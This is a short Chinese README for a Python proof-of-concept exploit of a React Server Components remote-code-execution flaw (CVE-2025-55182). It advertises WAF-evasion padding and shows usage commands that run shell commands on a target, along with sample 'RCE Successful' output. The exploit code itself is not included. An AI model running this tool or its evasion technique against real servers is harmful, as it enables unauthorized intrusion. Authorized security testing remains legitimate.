
一个简单的 react2shell PoC,带有基本的 WAF 绕过功能
一个针对 CVE-2025-55182(又名 React2Shell)的简洁、可靠的 Python 概念验证(PoC)漏洞利用程序,该漏洞是 Next.js(App Router)及类似框架所使用的 React Server Components 中的一个严重远程代码执行漏洞。
该 PoC 包含动态 WAF 绕过填充,可规避那些限制对大型 multipart 请求体进行深度检测的常见 Web 应用防火墙(Cloudflare、AWS WAF 等)。
requests 库pip install requests
python poc.py https://vulnerable-target.com "id"
python poc.py https://vulnerable-target.com "whoami" 256
[*] Sending payload to https://vulnerable-target.com with 256KB padding...
[*] Command: id
[+] RCE Successful! Output:
uid=1000(node) gid=1000(node) groups=1000(node),4(adm),27(sudo)
本工具仅用于经授权的安全测试与研究。